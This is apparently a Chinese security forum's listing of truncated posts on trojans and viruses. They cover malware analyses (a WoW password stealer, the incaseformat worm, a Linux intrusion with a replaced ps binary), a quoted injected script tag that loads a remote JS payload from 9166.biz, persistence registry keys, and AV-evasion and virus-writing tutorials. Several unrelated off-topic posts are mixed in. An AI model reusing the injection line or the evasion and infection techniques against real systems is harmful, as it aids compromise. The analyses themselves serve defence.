木马病毒分析
本节主要介绍网络病毒和木马的特点,并对这些对象进行拆解、分析和介绍。木马病毒具有很强的隐蔽性,可以根据黑客的意图突然发动攻击。
499个主题在此版块
-
- 0 篇回复
- 123 次查看
概述: 样本特征: 67f4fff7b479aceeebf7882cd61c40bb 样本大小: 57,640 字节。 编译特征: Microsoft Visual C++ [Overlay],UPX外壳处理过。 病毒名称:Win32. PSWTroj.WOW.ac(暂定) 病毒性质:这个样本是盗号木马,通过在宿主程序的内存中获取敏感信息,危害账号安全。 行为概述:1.替换系统文件,达到破坏安全软件使自己能够生存的目的。 2.InlineHook WoW.exe多处地址获得敏感信息 病毒行为分析 (一)流程总览 图-1 病毒的整体流程如图-1所示: 1. 首先病毒会判断宿主是否为ctfmon.exe,如果是的话则执行结束杀软流程,主要针对360安全卫士 2. 如果宿主是WoW.exe那么病毒会执行盗取魔兽世界账号流程,对游戏进行暴力特征匹配找到出现明文信息的位置然后做inlineHook得到敏感信息。 (二)病毒主要负载分析: 病毒的主要负载是对WoW账号的盗取流程如图-2所示: 图-2 1. 首先病毒通过自己实现的GetProcAddress获取CreateThread地址 2. 然后病毒创建了盗号线程sub_10005046如图-3所示: 图-3 1. 首先病毒会在附加数据中读取发送账号密码的地址,并通过10005EE4对读出的地址解密,解密过程是简单的异或如图-4所示,解密后的地址如图-5所示: 图-4 图-5 2. 再次判断宿主是否为WoW.exe,如不是退出,如果是进入步…
KaiWn的最后回复, -
- 0 篇回复
- 105 次查看
病原微生物分析: Eg:痢疾杆菌 测序---比对(K12vs治病菌1vs治病菌2),发现: “毒力岛”:K12没有,两个治病菌有,缩小搜寻范围。 “黑洞”:K12有,但两个治病菌没有。 SARS: 构建系统发育树,发现由冠状病毒进化而来。 不同地区的SARS基因组比较,可溯源病毒传播 根据各SARS冠状病毒分离株与造成香港Metropole饭店疫情的SARS冠状病毒株之间的联系,它们可以被分成2类(分别称之为”局域传播类”和”全球传播类”),这两类在我们构建的世系谱上得到准确的重现,这为SARS的流行病学研究提供了辅助信息。 人类基因组范围: 28,000+-4,000----3万/4万---14015个
CHQ1d的最后回复, -
- 0 篇回复
- 98 次查看
Malwarebytes反恶意软件是为Windows的恶意软件扫描程序。 作者声称使用各种技术来查找其他恶意软件扫描仪检测不到的恶意软件。 有一个有限选项的免费试用版和支持能够运行扫描计划的完整版本, ClamAV是一款功能强大的AntiVirus扫描仪,专注于集成于邮件服务器附件进行扫描。 它提供了一个灵活可扩展的多线程守护进程,一个命令行扫描器和一个通过Internet自动更新的工具。 Clam AntiVirus基于使用Clam AntiVirus软件包分发的共享库,您可以使用自己的软件。 最重要的是,病毒库保持最新。 该项目于2007年被Sourcefire收购。 VirusTotal是一个Web服务,用于分析已知病毒和其他恶意软件的提交文件。 它集成了来自不同供应商的数十种反病毒引擎,定期更新新的签名。 当文件没有被检测出来时加入的反病毒供应商可以在他们的产品中收到警报但它是由某人的软件报告了的。
Anonymous的最后回复, -
.thumb.jpg.efe932f5496dec4b6be0a5bdbb70a948.jpg)
- 0 篇回复
- 117 次查看
trojan psw.win32是一个木马病毒,病毒通过记录键盘的动作来盗取用户传奇的密码, 并且该病毒具有对抗杀毒软件的一些行为,使用户更难发现和杀毒。 木马 cmdbcs.exe cmdbcs.dll 手工清除方法 一、病毒行为分析 木马运行后复制自身到系统目录: %Windows%\cmdbcs.exe 释放%System%\cmdbcs.dll注入进程。 创建启动项: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "cmdbcs"="%Windows%\cmdbcs.exe" 二、手工清除步骤 1. 删除木马启动项: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "cmdbcs"="%Windows%\cmdbcs.exe" 2. 重新启动计算机 3. 删除木马文件和目录: %Windows%\cmdbcs.exe %System%\cmdbcs.dll
XenoG的最后回复, -
- 0 篇回复
- 101 次查看
java.io.IOException: Cannot rename …\segments.new to …\segments …… 或 java.io.IOException: Cannot rename …\deletable.new to …\deletable …… 逐一检查了代码、系统目录权限等方面均没有发现问题的所在。后来Google了一下,终于知道原因在杀毒软件的病毒防火墙上面。因为Lucene在生成索引的过程中频繁的创建合并文件,这样病毒防火墙不断地进行监测分析,这个时候就会锁定某个文件,造成Lucene无法进行操作。貌似卡巴斯基的这个问题最严重,呵呵 另外如果关闭病毒防火墙之后依然出现上述异常的话就设置每500条数据就使用optimize()方法对索引优化一次;如果依然出现问题的话那应该更新你的Lucene和lucene analyzers包,因为Lucene2.0有这个bug。我将两个包都更新到最新的2.1版本(2007.4.17)之后运行程序一直没有出现上面的异常提示。 最后总结一下解决的方法,逐一按照一下步骤进行操作: 1) 关闭病毒防火墙; 2) 每500条数据就使用optimize()方法对索引优化依次; 3) 更新Lucene和Analyzers为2.1版本。
风尘剑心的最后回复, -
- 0 篇回复
- 108 次查看
2006年世界顶级杀毒软件排名 2006-09-01 15:19:33 (回复:1 浏览:315) [其他帖] 2006年世界顶级杀毒软件排名 2006年世界顶级杀毒软件排名 金奖: BitDefender 银奖: Kaspersky 铜奖: F-Secure Anti-Virus 第四名: PC-cillin 第五名: ESET Nod32 第六名: McAfee VirusScan 第七名: Norton AntiVirus 第八名: AVG Anti-Virus 第九名: eTrust EZ Antivirus 第十名: Norman Virus Control 第十一名:AntiVirusKi 第十二名:AVAST 这里是排名的国外网站,各种功能、价格、获奖等非常详细,看懂英文要好啊! http://anti-virus-software- review.toptenreviews.com 排名第一的BitDefender 简介:BitDefender杀毒软件是来自罗马尼亚的老牌杀毒软件,二十四万超大病毒库,它将为你的计算机提供最大的保护,具有功能强大的反病毒引擎以及互联网过…
轩辕三官的最后回复, -
- 0 篇回复
- 141 次查看
Atitit。木马病毒原理机密与概论以及防御 1. 定时截屏木马1 1.1. QQ聊天与微信聊天木马1 2. 文档木马1 3. 病毒木马的触发方式2 4. 远程木马2 5. 漏洞木马2 6. 病毒木马的隐藏机制2 7. 自我复制技术3 8. 木马病毒的免杀3 9. 其他木马病毒3 9.1. Gui接口的调用3 9.2. 注册表编程 4 9.3. 服务相关的编程 4 9.4. 进程与线程 4 9.5. 操作窗口4 9.6. 病毒的感染技术4 9.7. 恶意程序的自启动技术4 10. 木马的加壳4 10.1. 扫描器 嗅探器、4 1. 定时截屏木马 Atitit 截图定时截屏记录木马的原理与防范 1.1. QQ聊天与微信聊天木马 2. 文档木马 3. 病毒木马的触发方式 atitit 病毒木马的触发方式.docx 4. 远程木马 atitit 木马病毒 webftp.docx atitit 木马病毒webshell的原理and设计.docx Atitit.java http 代理 atiHttpProxy 大木马.docx Atitit.木马病毒websql.docx atitit 图片 木马 与 远程接口 监控 常用的api 标准化 v2 q216.docx 5. 漏洞木马 Atitit. Xss 漏洞的原理and应用xss…
RenX6的最后回复, -
- 0 篇回复
- 99 次查看
Atitit。木马病毒原理机密与概论以及防御 1. 定时截屏木马1 1.1. QQ聊天与微信聊天木马1 2. 文档木马1 3. 病毒木马的触发方式2 4. 远程木马2 5. 漏洞木马2 6. 病毒木马的隐藏机制2 7. 自我复制技术3 8. 木马病毒的免杀3 9. 其他木马病毒3 9.1. Gui接口的调用3 9.2. 注册表编程 4 9.3. 服务相关的编程 4 9.4. 进程与线程 4 9.5. 操作窗口4 9.6. 病毒的感染技术4 9.7. 恶意程序的自启动技术4 10. 木马的加壳4 10.1. 扫描器 嗅探器、4 1. 定时截屏木马 Atitit 截图定时截屏记录木马的原理与防范 1.1. QQ聊天与微信聊天木马 2. 文档木马 3. 病毒木马的触发方式 atitit 病毒木马的触发方式.docx 4. 远程木马 atitit 木马病毒 webftp.docx atitit 木马病毒webshell的原理and设计.docx Atitit.java http 代理 atiHttpProxy 大木马.docx Atitit.木马病毒websql.docx atitit 图片 木马 与 远程接口 监控 常用的api 标准化 v2 q216.docx 5. 漏洞木马 Atitit. Xss 漏洞的原理and应用xss木马.docx 6. 病毒木马的隐藏机制 atitit 病毒木马的隐藏机制 以及 探测方式.…
HACK7YD的最后回复, -
- 0 篇回复
- 114 次查看
4月27日,哔哩哔哩视频网站的UP主“机智的党妹”发布消息称,自己被黑客勒索了。 她的视频表示:“事发突然,我被勒索了,你也有可能继续被诈骗!这种诈骗的页面是由病毒程序自动生成并留在那里的。”根据她的介绍是因为自己的视频素材被黑客盗取,对方要求支付“赎金”才愿意将素材还回来。 “机智的党妹”是B站的一名UP主,她的粉丝高达500多万,也算是一个大咖网红了,近日这位党妹却被黑客勒索了,机智的党妹在发布的视频中表示“事发突然,我被勒索了,党妹视频的数据被黑客攻击入侵所有视频素材都被“挟持”了,黑客要求党妹“给钱交素材”然后留下了勒索的信。如今党妹已经报警了但是警察说不能立案,也是没有办法的事情毕竟没有现金的损失,党妹也是无奈。 被加密的文件 勒索提示信息 他们团队迅速报警,刑侦队和网安经过鉴定后,因为没有造成实际的经济损失,所以发现无法立案,而又无法查到对方的IP地址。 所以面临的只有两个选择:1.给黑客钱赎回这些素材;2.找解密公司。 但是给黑客交赎金这方式也并不可取,因为人的欲望是无法被满足的,有了第一次就有第二次。而找解密公司进行解密,勒索病毒大部分用 RSA2048 进行加密,解密公司并没有这个算力。 视频中提到了一个名为“Buran”的勒索病毒。Burn勒索病毒在2019年8月首次在国内出现,被发现该勒索病毒主要通过爆破远程桌面,拿到密码后进行手动投毒。同时在受害者机器上发现大量工具。从工具看该勒索病毒传播还在不断攻击内网其他机器以及想通过抓取密码的方式获取更多机器的密码。不…
cnhackteam7的最后回复, -
- 0 篇回复
- 122 次查看
一个环境,突然使用很卡顿,于是用top查看什么进程占用了资源,发现进程中有大量b开头的进程,基本确定系统是中病毒了。 如上图,top显示大量b开头进程,进程号还不停的变。快速用lsof -p <PID>,查看一个病毒进程,结果如下 lsof的输出来看,病毒进程程序体被删除了。尝试用rm去删除程序体也显示无文件。 于是用ps命令查看进程情况,竟然发现无法列出病毒进程 ps命令无法列出进程名,十有八九ps命令的文件被替换了,好多病毒有这方面的套路,于是重启安装ps的rpm包,恢复ps命令。重新安装ps的rpm包后,ps命令的md5值确实不一样了,基本可以断定ps命令被替换了。 替换到正确的ps命令后,此时top按cpu负载排序,发现2个ps开头,100%占用cpu的进程。 ps能占用100%的cpu,更加佐证之前ps有问题。再次用lsof -p <PID>查看。 从上面输出来看,病毒从/tmp目录下执行,程序体像是运行了一个perl脚本,对外连接到193.169.252.253这个IP的80端口。于是用kill命令杀掉这两个进程,发现没有复生,top显示系统负载也正常。 总结: 总得来看,病毒像是个perl脚本,替换了系统ps命令然后伪装执行。很多病毒体,特别是rootkit类,会替换更多的系统命令的程序体,拦截系统调用来隐藏自己,排查起来往往更加棘手。事后分析了系统的/var/log/secure日志,是系统弱密码导致的这次病毒侵…
Tenfk的最后回复, -
.thumb.jpg.26764a69083eb4469b6d18365588b559.jpg)
- 0 篇回复
- 104 次查看
免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 被谁杀?当然是被杀毒软件(引擎)杀。所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的。 恶意代码检测方式 基于特征码的检测 特征库,也就是我们平时说的病毒库,它记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据自己检测出或网络上已发现报告的病毒,对其多段提取特征码,构成了对恶意软件查杀的重要因素; 杀毒软件都有着自己的庞大病毒库(实际上就是由特征码构成的一个数据库),杀毒时只需与特征码进行比对就可判断出软件是否有毒; 根据以上介绍,我总结了这种方式的查杀特点: 病毒库越大,杀毒有效率越高; 因为收集的是已发现病毒的特征码,所以误报率低; 对部分新型病毒没有抵抗性,无法抵御零日攻击,需要定期更新病毒库。 启发式恶意软件检测 “When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.”对照恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件吧! 用较为专业的角度来解释就是,分析对象文件与病毒特征库中的病毒原码进行比较,当二者匹配率大于某一值时…
尖REN的最后回复, -
题意: 给出n、d、k,n代表总共有几头牛,k代表有几种病毒,d代表最多几种病毒混合无害,接下来n行,每行最开始给出每头牛携带的病毒数,接下来给出具体是那些病毒。求最多几头牛放一起无害。 Sample Input 6 3 2 0 1 1 1 2 1 3 2 2 1 2 2 1 分析: 将每头牛所携带的病毒种类用二进制表达出来,像101代表他携有第一和第三种病毒,将d种病毒中取n个病毒的方式用二进制表达出来。(可取的方式为区间[pow(2,k)-1,pow(2,d)]内所有2进制形式下有n个1)。然后每种取法i与每头牛携带的病毒种类ca[j]进行|运算,如果等于i,则ans++,循环完后与tmp比较,保留大数。 代码: #include<iostream> #include<cstring> #include<cstdio> #include<cmath> #include<algorithm> using namespace std; int map[1010][20]; int ca[1010]; int cal(int i) { int ans=0; while(i>0) { if(i&1) ans++; i>>=1; } return ans; } int main() { memset(ca,0,sizeo…
Xiao7的最后回复, -
- 0 篇回复
- 138 次查看
1.绪论 本文研究的主要内容正如其题目所示是设计并编写一个先进的反病毒引擎。首先需要对这“先进”二字做一个解释,何为“先进”?众所周知,传统的反病毒软件使用的是基于特征码的静态扫描技术,即在文件中寻找特定十六进制串,如果找到,就可判定文件感染了某种病毒。但这种方法在当今病毒技术迅猛发展的形势下已经起不到很好的作用了。原因我会在以下的章节中具体描述。因此本文将不对杀毒引擎中的特征码扫描和病毒代码清除模块做分析。我们要讨论的是为应付先进的病毒技术而必需的两大反病毒技术--虚拟机和实时监控技术。具体什么是虚拟机,什么是实时监控,我会在相应的章节中做详尽的介绍。这里我要说明的一点是,这两项技术虽然在前人的工作中已有所体现(被一些国内外先进的反病毒厂家所使用),但出于商业目的,这些技术并没有被完全公开,所以你无论从书本文献还是网路上的资料中都无法找到关于这些技术的内幕。而我会在相关的章节中剖析大量的程序源码(主要是2.4节中的一个完整的虚拟机源码)或是逆向工程代码(3.3.3节和3.4.3节中三个我逆向工程的某著名反病毒软件的实时监控驱动程序及客户程序的反汇编代码),并同时公布一些我个人挖掘的操作系统内部未公开的机制和数据结构。下面就开始进入正题。 目录 1.1背景 1.2当今病毒技术的发展状况 1.2.1系统核心态病毒 1.2.2驻留病毒 1.2.3截获系统操作 1.2.4加密变形病毒 1.2.5反跟踪/反虚拟执行病毒 1.2.6直接API调用 1.2.7病毒隐藏 1.2.8病毒特殊感染法 …
剑道尘心的最后回复, -
- 0 篇回复
- 96 次查看
复习感想——数据结构篇其四_trie及其变形//从一次失败的尝试谈起 Trie树是用来处理多个字符串的数据结构。 Trie树的初始动机很简单,利用字符串间的公共前缀来节约字符串存储的空间及加快检索的速度。 例如:单词 computer和command在trie树中只需要存储 com 和 puter及mand三个部分 Trie树中从根节点出发到树上任意节点的路径都可以代表一个单词。 Trie树很直观,其插入删除查找操作也很简单,这里不再赘述。 下面着重看一个问题,我曾经对这个问题做过一个很失败的尝试,但是通过对trie的改进版能得到这个问题的很漂亮的解。 例一:病毒 二进制病毒审查委员会最近发现了如下规律:某些确定的二进制串是病毒的代码。如果某段代码中不存在任何一段病毒代码,那么我们就称这段代码是安全的。现在委员会已经找出了所有的病毒代码段,试问,是否存在一个无限长的安全的二进制代码。 例如:如果{011,11,000000}是病毒代码集,那么0101010101。。。就是一个无限长安全代码。如果{01,11,000000}是病毒代码集,则不存在无限长安全代码。 分析:对于这个问题,我最开始的想法很简单(事实证明也很天真) 1. 设L是病毒集中最长的代码的长度。那么,容易证明,如果存在2L-1的长度的安全代码,那么,一定存在无限长安全代码。 2. 对2L-1的长度的所有代码都进行一次kmp。。。 我相信,这是一个很正常的“最初想法”,不难发现这个方法很慢,指数级的复杂度。。。 用类似…
KaiWn的最后回复, -
- 0 篇回复
- 103 次查看
怎样用C语言编写病毒 在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现. [Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0. 一、什么是病毒 恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是很重要的. 我们要对付病毒,就要了解病毒. 写一些病毒是一个很好的办法. 如果要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的: “⋯⋯一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“ 其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。 要编制一个病毒,首先要知道病毒的运行机理。 不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。 在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本 原因。我们可以用一段类C伪码来表示这个过程。 InfectSection() { if (infectable_object_found &&object_not_already_infect) infect_object; } 病毒的第二个…
CHQ1d的最后回复, -
- 0 篇回复
- 113 次查看
怎样用C语言编写病毒 在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现. [Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0. 一、什么是病毒 恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是很重要的. 我们要对付病毒,就要了解病毒. 写一些病毒是一个很好的办法. 如果要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的: “⋯⋯一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“ 其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。 要编制一个病毒,首先要知道病毒的运行机理。 不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。 在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本 原因。我们可以用一段类C伪码来表示这个过程。 InfectSection() { if (infectable_object_found &&object_not_already_infect) infect_object; } 病毒的第二个…
Anonymous的最后回复, -
最近在分析一个病毒时,病毒通过创建傀儡进程,内存映射来执行恶意代码。 但在分析的时候遇到附加后傀儡进程数据出错的问题。 百度到的常见傀儡进程流程: (1)CreateProcess一个进程,并挂起,即向dwCreationFlags 参数传入CREATE_SUSPENDED; (2) GetThreadContext获取挂起进程CONTEXT,其中,EAX为进程入口点地址,EBX指向进程PEB; (3) ZwUnmapViewOfSection卸载挂起进程内存空间数据; (4) VirtualAlloc分配内存空间; (5) WriteProcessMemory将恶意代码写入分配的内存; (6) SetThreadContext设置挂起进程状态; (6) ResumeThread唤醒进程运行。 我分析的病毒的傀儡进程流程: 1) CreateProcess一个进程,并挂起,即向dwCreationFlags 参数传入CREATE_SUSPENDED; 2)在傀儡进程创建映射mapviewofsection; 3)代码修改OEP的数据 4)ZwUnmapViewOfSection卸载挂起进程内存空间数据; 5)Mapviewofsection映射镜像。 6)ResumeThread唤醒进程运行。 病毒本身含有傀儡进程的静态数据,通过在内存中修改数据在映射,并未使用GetThreadContext和 SetThreadContext来改数据。 并且傀儡进程在调用dll的时候不是直接调用,而是通过另一段映射过…
XenoG的最后回复, -
- 0 篇回复
- 113 次查看
原文:http://x.360safe.com/index.php/1/action_viewspace_itemid_27395.html 近日,360安全中心接到大量用户的举报,称全局域网的电脑中都出现了弹出5y5.us或9166.biz等网页,电脑被种植多个木马病毒,时常断网等现象。 专杀工具下载地址: http://dl.360safe.com/kill_arp.exe 360安全中心的工程师随即对此进行了分析。 9166.biz ---ARP木马病毒的恶意行为: 1.通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播源 2.ARP攻击篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加"<scrīpt src=http://9166.biz/w.js></scrīpt>"等内容,从而使局域网内有XML漏洞的电脑同时感染此病毒。 3.查杀困难,整个网络不时掉线:由于遭受攻击的局域网一般都是多台电脑感染,同时发起ARP攻击,因此整个局域网很不稳定,时常掉线甚至瘫痪。而且由于机器之间互相感染,因此彻底查杀及恢复非常困难。 4.后台下载多个热门游戏木马:该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马,偷窃用户游戏帐户。 据360安全中心专家分析,此ARP木马病毒已经导致了上百万台电脑感染,数万…
风尘剑心的最后回复, -
一、检查注册表启动项 大多病毒都会进入注册表启动项的,我们可以通过一些方法查看和删除。打开注册表HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion点击查看其中RUN中的内 容,如果不懂,把里面的东西就全删了。不过这样并不能 解决病毒,病毒还会重新写入的,不过到时可以解决木马。如果想手工杀毒,就接着看下面的文章吧! 二、解决不能查看隐藏文件的方法 1、有时病毒通过修改注册表和修改文件属性(伪造CheckedValue值)的方法来达到不能查看隐藏文件的目的 ,这是可是打开修改注册表,找 到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer \ Advanced\Folder\Hidden\SHOWALL,删除CheckedValue键(该键当前为字符串类 型),新建 CheckedValue为DWORD值(正确的键为DWORD类型),修改值为1,系 统隐藏文件就会显示了,恢复正常。 2、也可以通过ATTRIB命令使文件去掉隐藏和系 统的属性。例如显示C盘根目录下文件,就可以在CMD命令提示符下输入CD\命令 切换到根目录下,然后输入ATTRIB -S -H AUTORUN.INF命令就可以了 三、怎样删除病毒的主体文件 病毒都是有主体文件的,我们要手工杀毒首先就要清除病毒的主体文件,主体文件一般都是DLL文件,直接删是无法删除的,我们可以…
轩辕三官的最后回复, -
- 0 篇回复
- 113 次查看
2021年才开始的第一个月,病毒感染事件再起。昨天开始,很多用户开机后发现多数电脑除C盘外,全部格式化了,所有文件夹都被隐藏,只留下一个incaseformat.txt文件。这是incaseformat病毒在“卷土重来”,并且有大面积爆发迹象! 一、incaseformat病毒 蠕虫病毒:是常见的计算机病毒中的一种,主要通过网络(计算机漏洞、聊天工具、邮件等)和存储工具(U盘等)途径传播,通常隐藏在普通的文件中,比如DOC、PPT、JPG等。蠕虫是一种不断自我复制裂变的代码,在入侵一台计算机完全控制后,会将该计算机作为宿主继续传播感染其他计算机,类似棋盘摆米似的倍数增长。 incaseformat蠕虫病毒通过以下步骤入侵你的数据: 1、自动将本程序代码复制到系统盘符下的windows目录中(C:/windows/tsay/tsay.exe) 2、在注册表中自动创建开机自动启动的服务 (HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\msfsa) 3、病毒在下次用户开机时自动启动,通过DeleteFileA和RemoveDirectory代码实现对计算机非系统盘符外的所有存储区域进行文件删除 4、所有文件夹都被隐藏,只留下一个“incaseformat”文本文档 归结重点:incaseformat蠕虫病毒会自动删除计算机非系统盘的其他存储区域的数据,传播性强,隐蔽性高、危害性大,需要…
RenX6的最后回复,